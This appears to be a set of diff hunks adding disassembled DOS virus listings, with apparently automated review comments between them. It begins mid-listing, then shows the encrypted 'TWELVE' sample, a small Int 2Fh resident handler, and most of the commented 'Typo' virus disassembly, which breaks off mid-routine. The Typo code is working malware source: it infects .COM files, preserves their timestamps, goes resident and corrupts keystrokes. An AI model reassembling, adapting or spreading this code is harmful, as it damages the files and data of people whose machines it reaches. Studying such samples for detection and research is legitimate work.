; wait for for a keypress (doesn't matter which) then jump somewhere I can't understand.
xor byte ptr [bx+di],0AAh
inc di
loop locloop_19 ; Loop if cx > 0
mov ah,9
mov dx,data_21e ; (76AC:014B=8Bh)
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ah,9
mov dx,data_22e ; (76AC:017A=40h)
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ah,7
int 21h ; DOS Services ah=function 07h
; get keybd char al, no echo
loc_20:
mov cx,80h
mov di,0FEh
mov bx,80h
locloop_21:
pop ax
mov [bx+di],ax
dec di
dec di
loop locloop_21 ; Loop if cx > 0
mov cx,8
mov si,3DFh
mov di,0F800h
cld ; Clear direction
rep movsb ; Rep while cx>0 Mov [si] to es:[di]
mov cx,2E7h
mov si,ds:data_15e ; (76AC:0140=21CDh)
add si,100h
jmp $+0 ;replaced a jump to an inexistant loc_22
db 0BFh, 0, 1, 0F3h, 0A4h, 0E9h
db 0F8h, 8, 0EBh
db 5Dh
db 93 dup (90h)
db 0B8h, 0, 0, 0CDh, 21h
db 643 dup (0)
tw endp
code_seg_a ends
end
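Review bot: The `data_7e`..`data_11e` equates at the top of the listing are used as bare numbers (`mov dx,9Eh`, `mov cl,ds:data_7e`, `mov cx,ds:data_8e`) with no comment saying what they are; their offsets line up with the DOS default DTA at PSP:80h (find-first record: attribute 95h, time 96h, date 98h, size 9Ah, filename 9Eh), which is what the find-first/open sequence at `loc_6` reads, so a comment such as `; default DTA at PSP:80h -- find-first record: attr 95h, time 96h, date 98h, size 9Ah, name 9Eh` beside the equates would make the listing self-explanatory. The `and ax,1Fh / cmp al,1Fh` test at `loc_5` and the `or cl,1Fh` before the set-date call at the end of `loc_6` are the sample's infection marker (seconds field of the file time forced to all ones) and deserve a line saying so, since that is the field a scanner or cleanup tool would key on. The `jmp $+0 ;replaced a jump to an inexistant loc_22` line should also state that the reassembled image is probably not byte-identical to the original sample (the displacement was changed to make it assemble), because the header only claims the listing was verified by reassembly with MASM 5.1 and a reader may otherwise treat a rebuilt binary as hash-equivalent.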


@ -0,0 +1,302 @@
PAGE 59,132
;ロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロ
;ロロ ロロ
;ロロ TWELVE ロロ
;ロロ ロロ
;ロロ Created: 26-Apr-90 ロロ
;ロロ Version: ロロ
;ロロ Passes: 5 Analysis Options on: H ロロ
;ロロ ロロ
;ロロ ロロ
;ロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロ
data_1e equ 3366h ; (7415:3366=0)
data_2e equ 7EF7h ; (7415:7EF7=0)
data_3e equ 8C8Dh ; (7415:8C8D=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
twelve proc far
start:
;* jmp $+4h ;*
db 0E9h, 1, 0
db 21h, 46h, 0B8h, 9Bh, 1Ah, 0BFh
db 2Bh, 1, 90h, 4Bh, 0F8h, 0FCh
db 0B9h, 71h, 5, 31h, 0Dh, 2Bh
db 0DAh, 33h, 0D9h, 2Bh, 0D9h, 2Bh
db 0D8h, 90h, 33h, 0D1h, 31h, 5
db 46h, 43h, 0F8h, 40h, 90h, 47h
db 0E2h, 0E9h, 40h, 40h, 61h, 1Fh
db 6Eh, 3, 0C9h, 82h, 6Fh, 36h
db 0D1h, 5Ah, 8Bh, 33h, 0C3h, 6Bh
db 0D5h, 0D7h, 85h, 0CCh, 17h, 4Eh
db 0E9h, 0F3h, 7Ch, 0B1h, 29h, 52h
db 0FBh, 0FFh, 74h, 0B5h, 2Bh, 56h
db 0F9h, 0F3h, 64h, 0A9h, 0Dh, 32h
db 9Bh, 97h, 1Ch, 0D5h, 7Fh, 64h
db 82h, 7Bh, 0ADh, 94h, 1Eh, 61h
db 6Ch, 29h, 7Dh, 0F3h, 4Ah, 0F7h
db 0F4h, 4Ah, 0FEh, 0FFh, 1, 0
db 51h, 7Ch, 7, 47h, 0DDh, 22h
db 0CCh, 0EFh, 0D5h, 1Bh, 0F2h, 81h
db 0DEh, 36h, 5Fh, 0D1h, 0D3h, 63h
db 0FAh, 1Eh, 0CCh, 23h, 0E1h, 76h
db 0ABh, 0Bh, 39h, 5Ch, 0DEh, 0B9h
db 3, 0F4h, 7Eh, 21h, 74h, 31h
db 0Ch, 0EFh, 59h, 9, 0D9h, 37h
db 12h, 44h, 92h, 18h, 30h, 12h
db 0ABh, 16h, 14h, 4Ch, 0BAh, 6Eh
db 2Bh, 6Fh, 0F5h, 5Bh, 4Ch, 0F3h
db 7Dh, 0Dh, 53h, 4Ah, 0F1h, 0F7h
db 59h, 5Dh, 98h, 2, 0Fh, 29h
db 8Bh, 0D0h, 5Ch, 0ADh, 29h, 54h
db 3, 52h, 13h, 76h, 0D5h, 58h
db 13h, 4, 0D7h, 63h, 39h, 74h
db 8Bh, 7, 0FDh, 8Ah, 0F9h, 1Ah
db 0D1h, 0F5h, 39h, 0EDh, 0BBh, 0C9h
db 63h, 8Dh, 0B9h, 97h, 1Eh, 6Dh
db 0BBh, 14h, 0EBh, 67h, 14h, 50h
db 34h, 93h, 41h, 0D3h, 0D6h, 87h
db 0FEh, 0CBh, 0F5h, 87h, 0F9h, 55h
db 16h, 7, 39h, 49h, 0F5h, 0F3h
db 0B6h, 0F0h, 64h, 0A5h, 21h, 57h
db 28h, 2Ch, 0A9h, 0DCh, 6Dh, 8Fh
db 7Fh, 5Eh, 0ABh, 21h, 66h, 1Ch
db 6Ch, 35h, 63h, 0F7h, 4Ch, 0F5h
db 0FDh, 0Ch, 59h, 78h, 6, 43h
db 0BBh, 78h, 3Bh, 6Eh, 2Fh, 0B2h
db 15h, 0AEh, 16h, 13h, 0D0h, 3Eh
db 0F6h, 15h, 85h, 0DBh, 0A1h, 5Ch
db 20h, 0CEh, 9Eh, 0F0h, 1Eh, 68h
db 39h, 78h, 79h, 8, 0FDh, 0D7h
db 0EAh, 0CBh, 0EAh, 87h, 0, 6Eh
db 51h, 28h, 0D5h, 0D7h, 2Dh, 0A7h
db 38h, 5Ch, 61h, 28h, 0D5h, 0DDh
db 0A1h, 0Dh, 66h, 91h, 1Fh, 0A5h
db 74h, 31h, 0Ah, 0F3h, 51h, 55h
db 0C1h, 0F3h, 80h, 0Dh, 0ABh, 4Bh
db 0EDh, 0ACh, 66h, 45h, 14h, 55h
db 34h, 93h, 50h, 0BEh, 14h, 0DDh
db 63h, 2Fh, 94h, 0D0h, 6Ch, 0Eh
db 13h, 0Ch, 7Eh, 21h, 74h, 31h
db 5Ch, 0FFh, 30h, 0D2h, 4Dh, 0F5h
db 0C8h, 78h, 3Bh, 6Eh, 2Fh, 72h
db 0D5h, 1Ah, 0F4h, 0A0h, 0D9h, 36h
db 0B5h, 0D2h, 19h, 5Ch, 0Dh, 6Bh
db 0EDh, 0B8h, 20h, 0D2h, 7Ch, 0B9h
db 0Dh, 7Ah, 0ABh, 5, 49h, 0CCh
db 4Ch, 0F4h, 0F5h, 78h, 3Bh, 6Eh
db 2Fh, 83h, 12h, 0DDh, 33h, 0D8h
db 41h, 31h, 0, 0D8h, 0E7h, 0D8h
db 11h, 14h, 26h, 0ADh, 0DAh, 0E2h
db 39h, 8Fh, 35h, 0F1h, 0BFh, 33h
db 0CCh, 7Bh, 0F5h, 0F7h, 4Fh, 0F3h
db 0EDh, 22h, 0CCh, 0A0h, 0D6h, 3Eh
db 0C0h, 0D2h, 11h, 55h, 4, 1Fh
db 0Ah, 83h, 1Dh, 82h, 21h, 6Ah
db 45h, 0F0h, 0F5h, 3Bh, 15h, 9Ah
db 79h, 6Bh, 0FDh, 72h, 34h, 2Ah
db 0F1h, 3Fh, 89h, 0, 13h, 5Fh
db 0E1h, 62h, 7Ah, 3Ch, 9Eh, 53h
db 0Fh, 88h, 98h, 23h, 0B9h, 5Eh
db 0CCh, 0DCh, 3Ch, 3Fh, 0Bh, 80h
db 0A3h, 3, 31h, 3Eh, 0D4h, 0D7h
db 0F4h, 3Bh, 3Dh, 0B0h, 0ABh, 1Fh
db 21h, 34h, 17h, 28h, 0D5h, 1Fh
db 0F9h, 0FEh, 18h, 0D7h, 19h, 1Bh
db 90h, 95h, 5, 23h, 6Ah, 0FDh
db 71h, 0F0h, 0F5h, 0AAh, 31h, 0FFh
db 7Ch, 32h, 0D2h, 0F6h, 7Ch, 7Fh
db 0ECh, 0EFh, 21h, 83h, 6Dh, 0EDh
db 15h, 98h, 5Bh, 0EFh, 0D1h, 2Dh
db 0A2h, 51h, 0FFh, 9Ah, 69h, 0EBh
db 0EDh, 3Fh, 1Ch, 95h, 0Bh, 3Fh
db 0FEh, 7Dh, 12h, 2Eh, 0F6h, 3Bh
db 25h, 0A8h, 33h, 6Eh, 2Eh, 0F4h
db 0D5h, 10h, 93h, 35h, 0DAh, 0DFh
db 35h, 0C7h, 0D4h, 5Eh, 0ABh, 3Dh
db 6Ch, 2Ch, 0FDh, 0F3h, 39h, 0D1h
db 14h, 0B5h, 1Bh, 7Ch, 0FDh, 3Fh
db 0B9h, 53h, 0F4h, 0F2h, 6Ch, 2Ch
db 0FDh, 93h, 59h, 20h, 0CAh, 6Bh
db 9Dh, 26h, 9Fh, 93h, 1Eh, 0E1h
db 79h, 5Fh, 17h, 94h, 2Bh, 0D6h
db 0F5h, 4, 51h, 78h, 0BBh, 11h
db 0D6h, 34h, 0BAh, 5Dh, 7Eh, 0BDh
db 1, 6Eh, 4, 65h, 0D6h, 0ECh
db 1Ah, 0A7h, 0D4h, 65h, 0DDh, 0D3h
db 3Dh, 61h, 0D5h, 38h, 0, 23h
db 66h, 85h, 19h, 0A1h, 7Eh, 0Dh
db 31h, 5Eh, 0E5h, 0CAh, 0F5h, 76h
db 33h, 0A4h, 0EDh, 23h, 0D1h, 0AEh
db 0D3h, 18h, 16h, 99h, 0CBh, 0EDh
db 0B8h, 4Ch, 4Fh, 0FEh, 86h, 12h
db 0E9h, 0E9h, 0EDh, 0A3h, 0Ah, 15h
db 39h, 1Ah, 66h, 0DCh, 0C0h, 1Fh
db 0F1h, 3Bh, 96h, 0E5h, 0F1h, 57h
db 0EDh, 91h, 6Ch, 0D7h, 0D5h, 69h
db 0DDh, 0DFh, 10h, 0F2h, 0A7h, 0D8h
db 61h, 93h, 54h, 0ECh, 0EDh, 3Fh
db 21h, 0A8h, 23h, 72h, 3Fh, 6Ch
db 0FDh, 3Eh, 0D4h, 7Ch, 0A3h, 9
db 66h, 0A1h, 15h, 12h, 74h, 77h
db 6Ah, 12h, 54h, 80h, 9Dh, 2Bh
db 94h, 0C0h, 58h, 0B2h, 59h, 0D1h
db 20h, 0D2h, 4Dh, 0F6h, 0B6h, 78h
db 0B3h, 9, 76h, 25h, 74h, 35h
db 54h, 0F3h, 20h, 0CEh, 0F3h, 58h
db 83h, 2Bh, 5Bh, 8Dh, 23h, 6Bh
db 0C7h, 1Eh, 0F4h, 0C8h, 8Ch, 0E0h
db 2Dh, 0DCh, 36h, 0C0h, 27h, 0C4h
db 3, 78h, 18h, 40h, 0FDh, 0F2h
db 0A2h, 1Fh, 5Bh, 0F3h, 2Eh, 64h
db 0A3h, 0E3h, 94h, 0E6h, 29h, 92h
db 9Ch, 0DEh, 55h, 81h, 0C4h, 0DEh
db 0C4h, 0DAh, 3Ch, 26h, 64h, 0BDh
db 5, 76h, 14h, 0F4h, 0FDh, 0AEh
db 0BCh, 0C0h, 35h, 0Eh, 26h, 23h
db 0B4h, 2Ch, 0B5h, 83h, 16h, 3Fh
db 0Ch, 2Ch, 58h, 0Fh, 0A8h, 2Ah
db 0DEh, 7, 5Eh, 12h
loc_1:
cmp al,0Fh
mov bp,7E24h
aas ; Ascii adjust
lodsw ; String [si] to ax
mov bl,2Ah ; '*'
cld ; Clear direction
mov bx,7E1Fh
pop es
push es
push di
db 2Eh, 55h, 0EDh, 93h, 7Dh, 49h
db 6Ah, 18h, 5Fh, 0BCh, 0DBh, 75h
db 0AEh, 0D1h, 73h, 0E6h, 1Eh, 2Ch
db 0BEh, 78h, 29h, 0A7h, 0A3h
db 78h
locloop_2:
mov bh,ch
add dh,ds:data_2e[si] ; (7415:7EF7=0)
adc word ptr [bx],41h
esc 7,cl ; coprocessor escape
pop cx
xchg ax,dx
rcr cl,1 ; Rotate thru carry
rcl byte ptr [di-68h],cl ; Rotate thru carry
esc 2,ds:data_3e[di] ; (7415:8C8D=0) coprocessor escape
sbb al,ds:data_1e[bx+si] ; (7415:3366=0)
loc_3:
mov bp,7EA5h
adc word ptr [bx+di],0CD5Fh
sti ; Enable interrupts
ja loc_1 ; Jump if above
db 0F2h, 0D3h, 0Bh, 7Bh, 0AAh, 0E8h
db 0B3h
db 4Bh, 4Dh
loc_5:
esc 3,[bp+si+4E0Eh] ; coprocessor escape
movsb ; Mov [si] to es:[di]
push ds
adc [bp+0Bh],al
popf ; Pop flags
push si
add al,dl
db 6Fh, 0F3h, 0Fh, 54h, 0F9h, 0F3h
db 76h, 0B9h, 11h, 0DEh, 90h, 0F7h
db 56h, 0F7h, 0EDh
loc_6:
loopz locloop_2 ; Loop if zf=1, cx>0
;* jo loc_4 ;*Jump if overflow=1
db 70h, 0D3h
xlat [bx] ; al=[al+[bx]] table
jbe loc_5 ; Jump if below or =
esc 5,[si] ; coprocessor escape
test cx,sp
dec ax
adc al,49h ; 'I'
int 0BDh
push di
in ax,dx ; port 0, DMA-1 bas&add ch 0
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
call $-4A7Fh
sbb ax,5E05h
push bp
jl loc_3 ; Jump if <
das ; Decimal adjust
dec si
;* jmp short loc_7 ;*(04BD)
db 0EBh, 0EDh
db 18h, 0D3h, 49h, 36h, 95h, 9Dh
db 14h, 0DBh, 71h, 36h, 99h, 95h
db 68h, 0B5h, 0F0h, 70h, 30h, 4Ah
db 0DCh, 0F4h, 4Bh, 66h, 0E5h, 44h
db 82h, 0F0h, 0Fh, 9, 0B5h, 0A6h
db 7Fh, 0DCh, 0D6h, 0E4h, 0DAh, 0E6h
db 2, 0EEh, 6, 0F6h, 0Bh, 0FEh
db 0Eh, 0FEh
db 9
loc_8:
jge loc_6 ; Jump if > or =
stosb ; Store al to es:[di]
mov al,0B3h
mov ch,0Dh
mov ax,1D6Dh
sbb dh,al
cmc ; Complement carry
hlt ; Halt processor
div al ; al, ah rem = ax/reg
jmp short loc_8 ; (04FD)
db 0E4h, 12h, 1Fh, 16h, 1Eh, 12h
db 11h, 1Eh, 10h, 11h, 1Bh, 15h
db 5, 11h, 0FFh, 0EDh, 0F9h, 0F1h
db 0E3h, 0F5h, 0EDh, 0F1h, 0E7h, 0FEh
db 0E1h, 0F2h, 0E8h, 0F6h, 0EBh, 0F2h
db 0F2h, 0EEh, 0CDh, 0D2h, 0F4h, 0D6h
db 0F7h, 0D2h, 0FEh, 0DEh, 0F9h, 58h
db 9Bh, 3Fh, 5Eh, 95h, 7, 64h
db 13h, 72h, 1Ah, 41h, 0F6h, 1Bh
db 0DCh, 0FFh, 49h, 0B3h, 4Ch, 1Bh
db 0F1h, 78h, 3Bh, 6Eh, 7, 4Eh
db 96h, 5Ah, 0B4h, 0Fh, 0CDh, 14h
db 0D3h, 7Bh, 1Eh, 0D1h, 7Fh, 18h
db 13h, 6Eh, 2, 45h, 0F6h, 1Fh
db 0F6h, 0F3h, 0A5h, 62h, 3Eh, 0C2h
db 0F0h, 0C6h, 0F8h, 0B3h, 0AAh, 0Dh
db 15h, 10h, 61h, 0D7h, 18h, 3Ah
db 0DCh, 0DFh, 0F7h, 0FDh, 96h, 98h
db 98h, 0D3h, 0BDh, 0AEh, 0B9h, 0BBh
db 0C8h, 0B6h, 0B2h, 0B2h, 0AFh, 0D1h
db 0BEh, 0BCh, 0B8h, 0F7h, 0F5h, 0BEh
db 0EDh, 0EFh, 0EDh, 13h, 14h, 16h
db 14h, 12h, 1Ch, 1Eh, 1Ch, 12h
db 14h, 16h, 14h, 12h, 0ECh, 0EFh
db 0EDh, 0F3h, 0F5h, 0F7h, 0F5h, 0F3h
db 0FDh, 0FFh, 0FDh, 0F3h, 0F5h, 0F7h
db 0F5h, 0F3h, 0EDh, 0EFh, 0EDh, 0D3h
db 0D5h, 0D7h, 0D5h, 0D3h, 0DDh, 0DFh
db 0DDh, 0D3h, 0D5h, 0D7h, 0D5h, 0D3h
db 0EDh, 0EFh, 0EDh, 0F3h, 0F5h, 0F4h
db 0CAh, 0CCh, 0C2h, 0C0h, 0C2h, 0CCh
db 0CAh, 0C8h, 0B6h, 0BCh, 0A0h, 0ECh
db 0E3h, 93h, 95h, 97h, 29h, 5Fh
db 0B6h, 9Fh, 0BDh, 58h, 0Fh, 0Dh
db 81h, 97h, 0EDh, 0EFh, 0EDh, 0B2h
db 0B2h, 0B6h, 0A7h, 0DDh, 0BEh, 0B0h
db 0B0h, 0F3h, 0F5h, 0BAh, 0F5h, 0F3h
db 0EDh, 0EFh, 0EDh
twelve endp
seg_a ends
end start
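Review bot: Everything after the `db 0E9h, 1, 0` at `start` appears to be the sample's encrypted on-disk image, and the listing never says so: the instruction-looking lines from `loc_1` onward (`esc 7,cl`, `int 0BDh`, `hlt`, `div al`, `call $-4A7Fh`) are the disassembler decoding ciphertext, not control flow an analyst should follow. A header line such as `; body below is the encrypted image as stored on disk; the decryptor boundary is not marked -- confirm before reading any of it as code` would prevent that misreading. The labels `loc_1`..`loc_8` and `locloop_2` all fall inside that region and so carry no meaning either; a note to that effect beside the first of them would save the next reader the same detour.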

@ -0,0 +1,59 @@
SEG_A segment byte public
assume cs:seg_a,ds:seg_a
org 100h
MULTIPLEXOR proc far
start:
jmp BEGIN
MULTIPLEXOR endp
; Subroutine work on the DOS Int2Fh (Multiplexor)
; It stay rezident and calling Old Int2Fh, if don't call FnBAh.
; Functions (ah=BAh): ³ Return:
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; al=0 ³ al=0ffh, bl=READ_ON
; al=1 ³ bl=READ_ON=1
; al=2 ³ bl=READ_ON=0
; al=3 ³ Calling WRITE; bl=READ_ON=1
ADM proc
cmp ah,byte ptr cs:ADM_INT
je ADM_WORK
db 0eah
INT2F_JUMP db 0,0,0b2h,89h
ADM_WORK:
cmp al,0
jne ADM_WORK1
mov al,0ffh
IRET
ADM_WORK1:
push dx
push ax
mov dl,al
mov ah,2
int 21h
pop ax
pop dx
IRET
ADM endp
ADM_INT db 93h
REZIDENT:
BEGIN:
; Init interrupt vectors
mov ax,352fh
int 21h
mov word ptr cs:INT2F_JUMP,bx
mov word ptr cs:INT2F_JUMP+2,es
mov al,2fh
mov dx,offset ADM
mov ah,25h
int 21h
mov ah,093h
mov al,'*'
int 2fh
mov dx,offset REZIDENT
int 27h
SEG_A ends
end start
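Review bot: The header comment block (functions `ah=BAh`, `READ_ON`, `WRITE`) does not match the handler that follows: ADM compares AH against `ADM_INT db 93h`, and apart from `al=0` (returns AL=0FFh as the installed-check) every other AL value is simply echoed to the console through DOS fn 02h — there is no `bl=READ_ON` result and no WRITE call. The comment should describe what is implemented, e.g. `; Int 2Fh multiplex handler, id = ADM_INT (93h): al=0 -> al=0FFh (presence check); other al -> character printed via DOS fn 02h; other ah -> chained to old Int 2Fh`. That DOS call is made from inside the Int 2Fh handler, which is presumably unsafe when the caller was itself inside DOS, and the limitation belongs in the same comment. The `db 0eah` / `INT2F_JUMP db 0,0,0b2h,89h` far jump is patched in place by BEGIN, so the initial `0b2h,89h` bytes are dead placeholders and could be marked as such.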

@ -0,0 +1,433 @@
page 65,132
title The 'Typo' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Typo' Virus º
; º Disassembled by Joe Hirst, October 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
VECTOR SEGMENT AT 0
; Interrupt vectors
ORG 58H
BW0058 DW ? ; Interrupt 16H offset
BW005A DW ? ; Interrupt 16H segment
ORG 80H
BW0080 DW ? ; Interrupt 20H offset
BW0082 DW ? ; Interrupt 20H segment
BW0084 DW ? ; Interrupt 21H offset
BW0086 DW ? ; Interrupt 21H segment
VECTOR ENDS
RAM SEGMENT AT 400H
; System data
ORG 6CH
BW046C DW ? ; System clock
RAM ENDS
HOST SEGMENT AT 0
ORG 2CH
DW002C DW ?
ORG 0D0H
DW00D0 EQU THIS WORD
DB00D0 DB ?
ORG 100H
DB0100 DB ?
DW0101 DW ?
HOST ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:HOST
DB 'V1' ; Signature
DB 0E9H, 1, 0 ; Jump for start of host
DB '*.COM', 0 ; File spec for infection
DB 0CEH, 0CDH, 20H ; File start read buffer
DB 'V1' ; Signature test read buffer
DW 5 ; File handle
DB 0CDH, 20H, 90H ; Start of host
DB 0
DW 5AH ; Generation count
DB 0
; Entry point
START: PUSH BX
PUSH CX
PUSH DX
PUSH DS
PUSH ES
PUSH SI
PUSH CS
POP DS
CALL BP0024 ; \ Get current address
BP0024: POP SI ; /
SUB SI,24H ; Relocate from start of virus
DEC WORD PTR [SI+16H] ; Subtract from generation count
CMP WORD PTR [SI+16H],3 ; Is generation count three?
JNE BP0036 ; Branch if not
MOV WORD PTR [SI+16H],005BH ; Reset generation count to 91
BP0036: CALL BP02BE ; Test system for infection
MOV DX,00D0H ; Temp default DTA
MOV AH,1AH ; Set DTA function
INT 21H ; DOS service
MOV AL,[SI+0BH] ; \ Save start of host (1)
MOV [SI+12H],AL ; /
MOV AX,[SI+0CH] ; \ Save start of host (2)
MOV [SI+13H],AX ; /
MOV AH,2AH ; Get date function
INT 21H ; DOS service
TEST DL,1 ; First of month?
JNZ BP0074 ; Branch if not
MOV DX,SI ; \ Address '*.COM'
ADD DX,5 ; /
nop
XOR CX,CX ; No attributes
MOV AH,4EH ; Find first file function
INT 21H ; DOS service
JB BP0074 ; Branch if not found
BP0063: CALL BP0092 ; Test for infection
MOV DX,SI ; \ Address '*.COM'
ADD DX,5 ; /
nop
XOR CX,CX ; No attributes
MOV AH,4FH ; Find next file function
INT 21H ; DOS service
JNB BP0063 ; Branch if found
BP0074: MOV AL,[SI+12H] ; \ Restore start of host (1)
MOV DB0100,AL ; /
MOV AX,[SI+13H] ; \ Restore start of host (2)
MOV DW0101,AX ; /
MOV DX,0080H ; Original default DTA
MOV AH,1AH ; Set DTA function
INT 21H ; DOS service
POP SI
POP ES
POP DS
POP DX
POP CX
POP BX
MOV AX,0100H ; \ Branch to start of host
JMP AX ; /
; Test for infection in COM file
BP0092: MOV AX,4301H ; Set file attributes function
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
XOR CX,CX ; No attributes
INT 21H ; DOS service
MOV AX,3D02H ; Open handle (R/W) function
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
INT 21H ; DOS service
JNB BP00A9 ; Branch if no error
JMP BP015D ; Return
BP00A9: MOV [SI+10H],AX ; Save file handle
MOV BX,AX ; Move file handle
MOV AH,3FH ; Read handle function
MOV CX,3 ; Length to read
MOV DX,SI ; \ Address start-of-host store
ADD DX,000BH ; /
nop
INT 21H ; DOS service
CMP BYTE PTR [SI+0BH],0E9H ; Is it a jump?
JNE BP00F1 ; Branch if not
MOV DX,[SI+0CH] ; \
SUB DX,16H ; /
XOR CX,CX ; No high offset
MOV AX,4200H ; Move file pointer function
MOV BX,[SI+10H] ; Get file handle
INT 21H ; DOS service
MOV BX,AX ; Move actual offset (? not used)
MOV AH,3FH ; Read handle function
MOV CX,2 ; Length to read
MOV DX,SI ; \ Address signature test buffer
ADD DX,000EH ; /
nop
MOV BX,[SI+10H] ; Get file handle
INT 21H ; DOS service
JB BP014A ; Branch if error
CMP AX,0 ; Did we read anything?
JE BP00F1 ; Branch if not
MOV AX,[SI+0EH] ; Get signature test
CMP AX,[SI] ; Is it signature?
JE BP014A ; Branch if yes
BP00F1: XOR CX,CX ; \ No offset
XOR DX,DX ; /
MOV AX,4202H ; Move file pointer function (EOF)
MOV BX,[SI+10H] ; Get file handle
INT 21H ; DOS service
JB BP014A ; Branch if error
SUB AX,3 ; Convert length to jump offset
MOV [SI+3],AX ; Store in jump
MOV BX,[SI+10H] ; Get file handle
MOV AH,40H ; Write handle function
MOV CX,OFFSET ENDADR ; Length of virus
NOP
MOV DX,SI ; \ Address start of virus
ADD DX,0 ; /
nop
INT 21H ; DOS service
JB BP014A ; Branch if error
ADD WORD PTR [SI+3],19H ; Add entry point offset to jump offset
XOR DX,DX ; \ No offset
XOR CX,CX ; /
MOV AX,4200H ; Move file pointer function
MOV BX,[SI+10H] ; Get file handle
INT 21H ; DOS service
JB BP014A ; Branch if error
MOV BX,[SI+10H] ; Get file handle
MOV AH,40H ; Write handle function
MOV CX,3 ; Length of jump
MOV DX,SI ; \ Address initial jump
ADD DX,2 ; /
nop
INT 21H ; DOS service
MOV AX,5701H ; Set file date & time function
MOV BX,[SI+10H] ; Get file handle
MOV CX,DW00D0+16H ; Get file time from DTA
MOV DX,DW00D0+18H ; Get file date from DTA
INT 21H ; DOS service
BP014A: MOV BX,[SI+10H] ; Get file handle
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
MOV AX,4301H ; Set file attributes function
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
MOV CL,DB00D0+15H ; Get attributes from DTA
INT 21H ; DOS service
BP015D: RET
; Interrupt 16H routine
BP015E: STI
CMP AH,0DDH ; Infection test function?
JNE BP0167 ; Branch if not
MOV AL,AH ; Copy function number
IRET
BP0167: CMP AH,0 ; Get key token?
JE BP01D8 ; Branch if yes
DB 0EAH ; Far jump
DW016D DW 0488H ; Int 16H offset
DW016F DW 39D8H ; Int 16H segment
DW0171 DW 0FA76H
DW0173 DW 0F9DCH
DW0175 DW 005AH
DB0177 DB 060H, 031H, 032H, 033H, 034H, 035H, 036H, 037H
DB 038H, 039H, 030H, 02DH, 03DH, 05CH, 07EH, 021H
DB 040H, 023H, 024H, 025H, 05EH, 026H, 02AH, 028H
DB 029H, 05FH, 02BH, 07CH, 071H, 077H, 065H, 072H
DB 074H, 079H, 075H, 069H, 06FH, 070H, 05BH, 05DH
DB 05BH, 061H, 073H, 064H, 066H, 067H, 068H, 06AH
DB 06BH, 06CH, 03BH, 027H, 07AH, 078H, 063H, 076H
DB 062H, 06EH, 06DH, 02CH, 02EH, 02FH, 051H, 057H
DB 045H, 052H, 054H, 059H, 055H, 049H, 04FH, 050H
DB 07BH, 07DH, 041H, 053H, 044H, 046H, 047H, 048H
DB 04AH, 04BH, 04CH, 03AH, 022H, 03BH, 05AH, 058H
DB 043H, 056H, 042H, 04EH, 04DH, 03CH, 03EH, 03FH
DB 02EH
BP01D8: PUSH SI
CALL BP01DC ; \ Get current address
BP01DC: POP SI ; /
PUSHF
CALL DWORD PTR CS:[SI-6FH] ; Execute original BIOS call
PUSH BX
PUSH ES
MOV BX,0040H ; \ Address system RAM
MOV ES,BX ; /
ASSUME ES:RAM
MOV BX,BW046C ; Get system clock, low word
PUSH BX
SUB BX,CS:[SI-6BH] ; DW0171
CMP BX,2
POP BX
MOV CS:[SI-6BH],BX
JG BP0236
XCHG BX,CS:[SI-69H] ; DW0173
SUB BX,CS:[SI-69H]
NEG BX
CMP BX,CS:[SI-67H] ; DW0175
JL BP0236
DEC WORD PTR CS:[SI-67H]
CMP WORD PTR CS:[SI-67H],6
JE BP021E
MOV WORD PTR CS:[SI-67H],005BH
BP021E: SUB SI,65H
PUSH CX
MOV CX,0061H
BP0225: CMP AL,CS:[SI]
JE BP0231
INC SI
LOOP BP0225
POP CX
JMP BP0236
BP0231: POP CX
MOV AL,CS:[SI+1]
BP0236: POP ES
POP BX
POP SI
RETF 2
; Interrupt 21H routine
ASSUME ES:NOTHING
BP023C: CMP AH,0 ; Terminate program?
JE BP0246 ; Branch if yes
CMP AH,4CH ; Load?
JNE BP025F ; Branch if not
BP0246: CALL BP026D ; Install virus in memory
MOV DX,CS:DW002C ; \ Set ES to environment block
MOV ES,DX ; /
MOV BX,0 ; Zero length
MOV AH,4AH ; Set block function
INT 21H ; DOS service
MOV DX,001DH ; \ Length to keep
ADD DX,1 ; /
MOV AH,31H ; Keep process function
BP025F: DB 0EAH ; Far jump
DW0260 DW 2DEAH ; Int 21H offset
DW0262 DW 4242H ; Int 21H segment
; Interrupt 20H routine
BP0264: MOV AX,4C00H ; Fake a load
JMP BP023C ; Process as a DOS service
DW0269 DW 2C08H ; Int 20H offset
DW026B DW 4242H ; Int 20H segment
; Install virus in memory
BP026D: PUSH CX
PUSH DI
PUSH SI
PUSH ES
CALL BP0274 ; \ Get current address
BP0274: POP SI ; /
PUSH SI
MOV DI,0100H ; Address start of area
MOV CX,OFFSET BP023C-BP015E ; Length to copy
